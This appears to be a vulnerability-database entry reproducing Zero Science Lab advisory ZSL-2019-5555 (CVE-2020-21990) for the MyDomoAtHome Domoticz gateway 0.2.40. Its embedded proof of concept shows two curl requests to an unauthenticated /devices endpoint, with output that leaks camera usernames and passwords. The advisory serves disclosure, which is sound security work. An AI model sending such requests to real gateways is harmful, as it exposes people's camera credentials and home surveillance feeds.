MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure

2019-12-29T00:00:00

Description

Title: MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure Advisory ID: [ZSL-2019-5555](<ZSL-2019-5555.php>) Type: Local/Remote Impact: Exposure of System Information, Exposure of Sensitive Information, Security Bypass Risk: (4/5) Release Date: 29.12.2019 ##### Summary REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party integrations are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi. ##### Description MyDomoAtHome REST API is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information. ##### Vendor Emmanuel - <https://github.com/empierre/MyDomoAtHome> ##### Affected Version 0.2.40 ##### Tested On NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2 Webmanager/Engine: EJS Renderer: Express ##### Vendor Status N/A ##### PoC [domoticz_info.txt](<../../codes/domoticz_info.txt>) ##### Credits Vulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)> ##### References [1] <https://www.exploit-db.com/exploits/47824> [2] <https://packetstormsecurity.com/files/155787> [3] <https://cxsecurity.com/issue/WLB-2020010007> [4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173700> [5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21990> [6] <https://nvd.nist.gov/vuln/detail/CVE-2020-21990> [7] <https://www.tenable.com/cve/CVE-2020-21990> ##### Changelog [29.12.2019] - Initial release [24.01.2020] - Added reference [1], [2], [3] and [4] [19.06.2021] - Added reference [5], [6] and [7] ##### Contact Zero Science Lab Web: <http://www.zeroscience.mk> e-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)

{"id": "ZSL-2019-5555", "vendorId": null, "type": "zeroscience", "bulletinFamily": "exploit", "title": "MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure", "description": "Title: MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure \nAdvisory ID: [ZSL-2019-5555](<ZSL-2019-5555.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Exposure of Sensitive Information, Security Bypass \nRisk: (4/5) \nRelease Date: 29.12.2019 \n\n\n##### Summary\n\nREST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party integrations are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi. \n\n##### Description\n\nMyDomoAtHome REST API is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information. \n\n##### Vendor\n\nEmmanuel - <https://github.com/empierre/MyDomoAtHome>\n\n##### Affected Version\n\n0.2.40 \n\n##### Tested On\n\nNodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2 \nWebmanager/Engine: EJS \nRenderer: Express \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[domoticz_info.txt](<../../codes/domoticz_info.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/47824> \n[2] <https://packetstormsecurity.com/files/155787> \n[3] <https://cxsecurity.com/issue/WLB-2020010007> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173700> \n[5] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21990> \n[6] <https://nvd.nist.gov/vuln/detail/CVE-2020-21990> \n[7] <https://www.tenable.com/cve/CVE-2020-21990>\n\n##### Changelog\n\n[29.12.2019] - Initial release \n[24.01.2020] - Added reference [1], [2], [3] and [4] \n[19.06.2021] - Added reference [5], [6] and [7] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "published": "2019-12-29T00:00:00", "modified": "2019-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php", "reporter": "Gjoko Krstic", "references": [], "cvelist": ["CVE-2020-21990"], "immutableFields": [], "lastseen": "2021-12-13T08:05:52", "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-21990"]}]}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-21990"]}, {"type": "nessus", "idList": ["OPENSUSE-2017-662.NASL", "SUSE_SU-2017-1445-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:3B05FD25F1EFE431C23369F5790520EB"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceHref": "http://zeroscience.mk/codes/domoticz_info.txt", "sourceData": "<html><body><p>MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure\r\n\r\n\r\nVendor: Emmanuel\r\nProduct web page: https://github.com/empierre/MyDomoAtHome\r\n https://www.domoticz.com/wiki/ImperiHome\r\n https://docs.imperihome.com/app/iss\r\nAffected version: 0.2.40\r\n\r\nSummary: REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation\r\nsystem with a pretty wide library of supported devices, ranging from weather stations to\r\nsmoke detectors to remote controls, and a large number of additional third-party integrations\r\nare documented on the project's website. It is designed with an HTML5 frontend, making it\r\naccessible from desktop browsers and most modern smartphones, and is lightweight, running\r\non many low-power devices like the Raspberry Pi.\r\n\r\nDesc: MyDomoAtHome REST API is affected by an information disclosure vulnerability due to\r\nimproper access control enforcement. An unauthenticated remote attacker can exploit this,\r\nvia a specially crafted request to gain access to sensitive information.\r\n\r\nTested on: NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2\r\n Webmanager/Engine: EJS\r\n Renderer: Express\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2019-5555\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php\r\n\r\n\r\n07.11.2019\r\n\r\n--\r\n\r\n\r\n--snip--\r\nDevice Type string: DevCamera\r\nParam Key Description\r\n----------------------------\r\nlocaljpegurl Local URL to the JPEG snapshot of the camera (Note : login/pass can be passed like this http://login:pass@url)\r\nlocalmjpegurl Local URL to the camera's MJPEG stream\r\nremotejpegurl Remote URL to the JPEG snapshot of the camera\r\nremotemjpegurl Remote URL to the camera's MJPEG stream\r\n--snip--\r\n\r\n\r\nPoC #1:\r\n-------\r\n\r\nroot@kali:~/domoticz# curl -s http://192.168.0.100:3001/devices |tail -c $((100+850))\r\n[{\"value\":\"http://admin:s3cr3t0P4ssw0rduz@192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz\",\"key\":\"localjpegurl\"},{\"value\":\"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz\",\"key\":\"remotejpegurl\"}],\"name\":\"Ext\u00e9rieur\",\"type\":\"DevCamera\",\"id\":\"2_cam\",\"room\":\"Switches\"},{\"params\":[{\"value\":\"http://admin2:An0th3rs3cr3tp4ss@192.168.0.15:8084/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin2&pwd=An0th3rs3cr3tp4ss\",\"key\":\"localjpegurl\"},{\"value\":\"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz\",\"key\":\"remotejpegurl\"}],\"name\":\"cuisine\",\"type\":\"DevCamera\",\"id\":\"3_cam\",\"room\":\"Switches\"},{\"params\":[{\"value\":\"http://127.0.0.1:8080/uvccapture.cgi\",\"key\":\"localjpegurl\"},{\"value\":\"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz\",\"key\":\"remotejpegurl\"}],\"name\":\"uvccam\",\"type\":\"DevCamera\",\"id\":\"4_cam\",\"room\":\"Switches\"}]}\r\n\r\n\r\nPoC #2:\r\n-------\r\n\r\nroot@kali:~/domoticz# curl -s http://192.168.1.100:3001/devices |tail -c $((200-22))\r\n{\"id\":\"C0\",\"name\":\"Portail\",\"type\":\"DevCamera\",\"room\":\"Switches\",\"params\":[{\"key\":\"localjpegurl\",\"value\":\"http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp\"}]}]}\r\n</p></body></html>", "impact": "Exposure of System Information, Exposure of Sensitive Information, Security Bypass", "exploit_type": "Local/Remote", "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T15:09:04", "description": "Emmanuel MyDomoAtHome (MDAH) REST API REST API Domoticz ISS Gateway 0.2.40 is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-29T14:15:00", "type": "cve", "title": "CVE-2020-21990", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-21990"], "modified": "2021-05-08T04:57:00", "cpe": ["cpe:/a:domoticz:mydomoathome:0.240"], "id": "CVE-2020-21990", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-21990", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:domoticz:mydomoathome:0.240:*:*:*:*:node.js:*:*"]}]}

MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure

Description

Related